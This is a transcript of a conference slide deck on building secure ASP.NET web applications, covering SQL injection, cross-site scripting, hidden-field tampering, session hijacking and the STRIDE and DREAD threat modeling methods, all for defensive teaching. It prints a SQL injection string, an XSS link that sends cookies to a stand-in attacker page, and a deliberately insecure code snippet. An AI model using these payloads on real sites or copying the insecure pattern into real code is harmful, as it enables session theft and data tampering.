Presentation is loading. Please wait.

Presentation is loading. Please wait.

DEV311 Building Secure Web Applications: Threats And Threat Modeling Jeff Prosise Co-founder Wintellect (www.wintellect.com)

Published byLesley Sparks Modified over 8 years ago

Similar presentations

Presentation on theme: "DEV311 Building Secure Web Applications: Threats And Threat Modeling Jeff Prosise Co-founder Wintellect (www.wintellect.com)"— Presentation transcript:

1 DEV311 Building Secure Web Applications: Threats And Threat Modeling Jeff Prosise Co-founder Wintellect (www.wintellect.com)

2 Why Security? Reported security breaches in the last 12 months Acknowledged financial losses as a result Identified Internet connection as frequent source of attacks Reported intrusions to authorities 90% 2002 Computer Crime and Security Survey 80% 74% 34% Percentages of companies who participated in the survey

3 Call To Action Secure software requires knowledgeable IT personnel Software isn't secure if the network is not Administration is the bedrock of security Secure software also requires knowledgeable developers Proper administration is meaningless if the code you write isn't secure Most developers today don't know they're writing insecure code

4 This Is Insecure Code! <asp:Button Text="Click Me" OnClick="OnSubmit" runat="server" /> void OnSubmit (Object sender, EventArgs e) { Output.Text = "Hello, " + Input.Text; }

5 Threat Types Spoofed packets, etc. Buffer overflows, illicit paths, etc. SQL injection, XSS, input tampering, etc. NetworkHostApplication Threats against the network Threats against the host Threats against the application

6 Threats Against The Network ThreatExamples Information gathering Port scanning Using trace routing to detect network topologies Using broadcast requests to enumerate subnet hosts Eavesdropping Using packet sniffers to steal passwords Denial of service (DoS) SYN floods ICMP echo request floods Malformed packets Spoofing Packets with spoofed source addresses i http://msdn.microsoft.com/library/en- us/dnnetsec/html/THCMCh15.asp?frame=true#c15618429_004

7 Threats Against The Host ThreatExamples Arbitrary code execution Buffer overflows in ISAPI DLLs (e.g., MS01-033) Directory traversal attacks (MS00-078) File disclosure Malformed HTR requests (MS01-031) Virtualized UNC share vulnerability (MS00-019) Denial of service (DoS) Malformed SMTP requests (MS02-012) Malformed WebDAV requests (MS01-016) Malformed URLs (MS01-012) Brute-force file uploads Unauthorized access Resources with insufficiently restrictive ACLs Spoofing with stolen login credentials Exploitation of open ports and protocols Using NetBIOS and SMB to enumerate hosts Connecting remotely to SQL Server i http://msdn.microsoft.com/library/en- us/dnnetsec/html/THCMCh15.asp?frame=true#c15618429_004

8 Threats Against The Application ThreatExamples SQL injection Including DROP TABLE command in text typed into an input field Cross-site scripting Using malicious client-side script to steal cookies Hidden-field tampering Maliciously changing the value of a hidden field Eavesdropping Using a packet sniffer to steal passwords and cookies from traffic on unencrypted connections Session hijacking Using a stolen session ID cookie to access someone else's session state Identity spoofing Using a stolen forms authentication cookie to pose as another user Information disclosure Allowing client to see a stack trace when an unhandled exception occurs i http://msdn.microsoft.com/library/en- us/dnnetsec/html/THCMCh15.asp?frame=true#c15618429_004

9 SQL Injection Exploits applications that don’t validate input used to form database commands Input from fields Input from query strings The technique Find a field or query string parameter whose value is used in SQL queries Provide malicious input that modifies the nature of the query

10 How SQL Injection Works SELECT COUNT (*) FROM Users WHERE UserName=‘Jeff’ AND Password=‘imbatman’ SELECT COUNT (*) FROM Users WHERE UserName=‘’ or 1=1-- AND Password=‘’ Model Query Malicious Query "or 1=1" matches every record in the table "—" comments out the remainder of the query

11 SQL Injection

12 Cross-Site Scripting Exploits applications that don’t validate input echoed to the page Input from fields Input from query strings The technique Find a field or query string parameter whose value is used as output Get a victim to click a link that injects malicious client-side script into the page

13 How Cross-Site Scripting Works <a href="http://…/Search.aspx? Search= Search= document.location.replace('http://localhost/EvilPage.aspx? Cookie=‘ + document.cookie); ">… ">… Query string contains embedded JavaScript that redirects to the hacker’s page and transmits any cookies issued by Search.aspx in a query string URL points to the site that the hacker wants to attack

14 Cross-Site Scripting

15 Hidden-Field Tampering Exploits apps that persist data between requests by round-tripping it in hidden fields The technique Look for tags Submit bogus requests with modified value attributes to spoof a Web server

16 How Hidden-Field Tampering Works <input type="hidden" id="price" value="10000.00"> value="10000.00"> Page contains this… Postback data should contain this… price="10000.00" Instead it contains this… price="1.00"

17 Hidden-Field Tampering

18 Session Hijacking Threat Risk Factor Theft and replay of session ID cookies High Links to sites that use cookieless session state Medium Predictable session IDs Low Remote connection to state server service Medium Remote connection to state server database Medium Eavesdropping on state server connection Medium Web applications use session state Sessions are per-user state stores Sessions can be compromised

19 Identity Spoofing Threat Risk Factor Theft of Windows authentication credentials High Theft of forms authentication credentials High Theft and replay of authentication cookies Medium Dictionary attacks and password guessing High Security depends on authentication If authentication can be compromised, security goes out the window Authentication can be compromised

20 Threat Modeling Structured approach to identifying, quantifying, and addressing threats Essential part of development process Just like specing and designing Just like coding and testing One technique presented here There are others (e.g., OCTAVE)

21 Threat Modeling Process Identify assets Document architecture Decompose application Identify threats Document threats Rate threats 1 2 3 4 5 6

22 Identifying Assets What is it that you want to protect? Private data (e.g., customer list) Proprietary data (e.g., IP) Potentially injurious data (e.g., credit card numbers, decryption keys) These also count as “assets” Integrity of back-end databases Integrity of the Web pages Integrity of other servers Availability of the application 1

23 Document Architecture Define what the application does and how it’s used Users view pages with catalog items Users perform searches for catalog items Users add items to shopping carts Users check out Diagram the application Show subsystems Show data flow List assets 2

24 ExampleExample Bob Alice Bill Asset #4 Asset #1 Asset #2 Asset #3 Asset #5 Asset #6 IISASP.NET Web Server Login State Main Database Server Firewall

25 Decomposing The App Refine the architecture diagram Show authentication mechanisms Show authorization mechanisms Show technologies (e.g., DPAPI) Diagram trust boundaries Identify entry points Begin to think like an attacker Where are my vulnerabilities? What am I going to do about them? 3

26 ExampleExample Bob Alice Bill IISASP.NET Web Server Database Server Trust Forms Authentication URL Authorization DPAPI Windows Authentication Firewall Login State Main

27 Identifying Threats Method #1: Threat lists Start with laundry list of possible threats Identify the threats that apply to your application Method #2: STRIDE Categorized list of threat types Identify threats by type/category Optionally draw threat trees Root nodes represent attacker's goals Trees help identify threat conditions 4

28 STRIDESTRIDE S T R I D Tampering Repudiation Information disclosure Denial of service Can an attacker gain access using a false identity? Can an attacker modify data as it flows through the application? If an attacker denies an exploit, can you prove him or her wrong? Can an attacker gain access to private or potentially injurious data? Can an attacker crash or reduce the availability of the system? E Elevation of privilege Can an attacker assume the identity of a privileged user? Spoofing

29 Threat Trees Theft of Auth Cookies Obtain auth cookie to spoof identity UnencryptedConnection Cookies travel over unencrypted HTTP Eavesdropping Attacker uses sniffer to monitor HTTP traffic Cross-SiteScripting Attacker possesses means and knowledge XSSVulnerability Application is vulnerable to XSS attacks OR ANDAND

30 Documenting Threats Theft of Auth Cookies by Eavesdropping on Connection Threat target Connections between browsers and Web server Risk Attack techniques Attacker uses sniffer to monitor traffic Countermeasures Use SSL/TLS to encrypt traffic Document threats using a template Theft of Auth Cookies via Cross-Site Scripting Threat target Vulnerable application code Risk Attack techniques Attacker sends e-mail with malicious link to users Countermeasures Validate input; HTML-encode output 5

31 Rating Threats Simple model DREAD model Greater granularization of threat potential Rates each threat on scale of 1 to 15 Widely used within Microsoft Risk = Probability * Damage Potential 1-10 Scale 1 = Least probable 10 = Most probable 1-10 Scale 1 = Least damage 10 = Most damage 6

32 DREADDREAD D R E A D Reproducibility Exploitability Affected users Discoverability What are the consequences of a successful exploit? Would an exploit work every time or only under certain circumstances? How skilled must an attacker be to exploit the vulnerability? How many users would be affected by a successful exploit? How likely is it that an attacker will know the vulnerability exists? Damage potential

33 DREADDREAD High (3) Medium (2) Low (1) Damage potential Attacker can retrieve extremely sensitive data and corrupt or destroy data Attacker can retrieve sensitive data but do little else Attacker can only retrieve data that has little or no potential for harm Reproduc- ability Works every time; does not require a timing window Timing-dependent; works only within a time window Rarely works Exploitability Bart Simpson could do it Attacker must be somewhat knowledgeable and skilled Attacker must be VERY knowledgeable and skilled Affected users Most or all users Some users Few if any users Discoverabilty Attacker can easily discover the vulnerability Attacker might discover the vulnerability Attacker will have to dig to discover the vulnerability

34 Example ThreatDREADSum Auth cookie theft (eavesdropping) 3232313 Auth cookie theft (XSS) 3222312 Potential for damage is high (spoofed identities, etc.) Cookie can be stolen any time, but is only useful until expired Anybody can run a packet sniffer; XSS attacks require moderate skill All users could be affected, but in reality most won't click malicious links Easy to discover: just type a block into a field PrioritizedRisks

35 Microsoft Products And Services For Lifelong Learning www.microsoft.com/learning Assessmentswww.microsoft.com/assessment Courses 2310: Developing Microsoft ASP.NET Web Applications Using Visual Studio.NET 2640: Upgrading Web Development Skills from ASP to Microsoft ASP.NET 1905: Building XML-Based Web Applications 2311: Advanced ASP.NET (scheduled release July 04) Books Designing ASP.NET Applications, ISBN: 0-7356-1348-6 Programming Microsoft ASP.NET, ISBN: 0-7356-1903-4 Microsoft ASP.NET Coding Strategies with the Microsoft ASP.NET Team, ISBN: 0-7356-1900-X Developing Microsoft® ASP.NET Server Controls and Components, ISBN: 0-7356-1582-9 Building Secure Microsoft ASP.NET Applications, ISBN: 0-7356-1890-9 Building Microsoft ASP.NET Applications for Mobile Devices (Second Edition), ISBN: 0-7356-1914-X MCAD/MCSD Self-Paced Training Kit: Developing Web Applications with Microsoft Visual Basic.NET and Microsoft Visual C#.NET (Second Edition), ISBN 0-7356-1927-1 Microsoft Products and Services for Lifelong Learning

36 DEV311 Building Secure Web Applications: Threats And Threat Modeling Jeff Prosise Co-founder Wintellect (www.wintellect.com)

Download ppt "DEV311 Building Secure Web Applications: Threats And Threat Modeling Jeff Prosise Co-founder Wintellect (www.wintellect.com)"

Similar presentations

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
Steven Borg & Richard Hundhausen Accentient, Inc

Steven Borg & Richard Hundhausen Accentient, Inc
Threats and Threat Modeling

Threats and Threat Modeling
Security Threat Modeling

Security Threat Modeling
Hacking Presented By :KUMAR ANAND SINGH 04-243,ETC/2008.

Hacking Presented By :KUMAR ANAND SINGH ,ETC/2008.
Security Issues and Challenges in Cloud Computing

Security Issues and Challenges in Cloud Computing
It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.

It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
Sanjay Goel, School of Business/Center for Information Forensics and Assurance University at Albany Proprietary Information 1 Unit Outline Information.

Sanjay Goel, School of Business/Center for Information Forensics and Assurance University at Albany Proprietary Information 1 Unit Outline Information.
ASP.NET Security Part 1 Dave Glover

ASP.NET Security Part 1 Dave Glover
ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.

ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.
Web server security Dr Jim Briggs WEBP security1.

Web server security Dr Jim Briggs WEBP security1.
Chapter 4 Application Security Knowledge and Test Prep

Chapter 4 Application Security Knowledge and Test Prep
Jonas Thomsen, Ph.d. student Computer Science University of Aarhus Best Practices and Techniques for Building Secure Microsoft.

Jonas Thomsen, Ph.d. student Computer Science University of Aarhus Best Practices and Techniques for Building Secure Microsoft.
COEN 252: Computer Forensics Router Investigation.

COEN 252: Computer Forensics Router Investigation.
Hacking Web Server Defiana Arnaldy, M.Si 0818 0296 4763.

Hacking Web Server Defiana Arnaldy, M.Si
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
Internet Relay Chat Chandrea Dungy Derek Garrett #29.

Internet Relay Chat Chandrea Dungy Derek Garrett #29.

Similar presentations

Ads by Google